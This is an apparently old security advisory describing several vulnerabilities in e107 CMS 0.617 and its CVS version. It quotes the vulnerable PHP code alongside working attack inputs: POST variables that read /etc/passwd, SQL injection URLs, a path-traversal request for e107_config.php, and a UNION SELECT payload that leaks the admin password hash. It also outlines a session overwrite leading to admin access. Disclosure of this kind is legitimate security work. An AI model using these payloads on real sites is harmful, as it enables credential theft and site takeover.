Multiple vulnearabilities in e107 cms
Software: http://www.e107.org
Author: Heintz
Advisory origin: http://www.waraxe.us
Software bugtracker:
http://e107.org/e107_plugins/bugtracker2/bugtracker2.php?0.bug.558
e107 v 0.617
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
search.php line ~ 142
if($_POST['searchquery']){
echo "<div
style='border:0;padding-right:2px;width:auto;height:400px;overflow:auto;'>";
unset($text);
extract($_POST);
here extract() registeres and overwrites any variables in _POST array - this is
worse than
registered globals.
few lines forward:
if(file_exists($search_info[$key[$a]]['sfile'])){
@require_once($search_info[$key[$a]]['sfile']);
$ns -> tablerender(LAN_195." ".$search_info[$key[$a]]['qtype']." :
".LAN_196.": ".$results,
$text);
}
so we need to POST following variables:
searchquery=aaa
search_info[0][sfile]=/etc/passwd
searchtype[0]=0
searchtype[1]=0
lets look forward
top.php line ~79
sql queries before it has quotes around variable and those cant be braken out,
but
in this case there isnt need to send any quotes in variable:
$replies = $sql2 -> db_Select("forum_t", "*", "thread_parent=$thread_id");
top.php?[INJECTION].active.all.[INJECTION]
though this requires mysql version to support subqueries, to have any use of
this.
lets look more:
when downloads are handled/sent by php (this option turned on)
request.php ~87
send_file(e_FILE."public/".$download_url);
when theres not "http://" or "ftp://" in file to be downloaded, then
file is read and sent to user.
request.php?../../e107_config.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
downloaded CVS and things are better but not enought,
this advisory continues with CVS version of software.
CVS is subject to change however.
lets start with less dangerous features of software:
e107_files/resetcore.php ~199
if (isset($_POST['reset_core_sub']) && $_POST['mode'] == 1) {
$a_name = preg_replace('/\\W/i', '', $_POST['a_name']);
$a_password = preg_replace('/\\W/i', '', $_POST['a_password']);
if (!$result = mysql_query("SELECT * FROM ".$mySQLprefix."user WHERE
user_name='{$a_name}' AND
user_password='{$a_password}' AND user_perms=0")) {
exit;
}
if reset_core_sub and mode variables are set and sql query syntax is ok,
note i sayd query *syntax* - no data needs to retrieved with query.
then we get cms core configuration as a good info which we are going into.
lets move on
forum_viewforum.php ~196
if($sql -> db_Select("forum_t", "*", "thread_forum_id='".$forum_id."' AND
thread_parent='0'
ORDER BY thread_s DESC, thread_lastpost DESC, thread_datestamp DESC LIMIT
$from, $view")){
forum_viewforum.php?5.[INJECTION]#
lets go on
request.php line ~120
if ($type == "file")
{
$qry = "
SELECT d.*, dc.download_category_class FROM #download as d
LEFT JOIN #download_category AS dc ON dc.download_category_id = d.download_id
WHERE d.download_id = $id;
";
request.php?1/**/UNION/**/SELECT/**/null,null,concat(user_password,0x687474703A2F2F00),null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/FROM/**/e107_user/**/WHE
RE/**/user_id=1
will try to redirect your browser to <adminhash>http://
in HTTP Location header.
and on
e107_handlers/upload_handler.php ~38
if ($pref['upload_storagetype'] == "2" && $avatar == FALSE) {
extract($_FILES);
for($c = 0; $c <= 1; $c++)
with enought knowlege about HTTP it would be possible to
"rewrite" _FILES to load local file to db (not very useful i guess, but read on)
extract() is able to rewrite _SESSION array, this is disasterous because this is
one array that is almost always trusted to contain valid data.
so we can enter admin hash and id to it and we are admin, and this leads to
own php code execution - which makes things real nasty.
Greets
~~~~~~~
slimjim100, fulvioo, Gotisch, KuerbY, legion and Torufoorum.
Special greets go to Waraxe.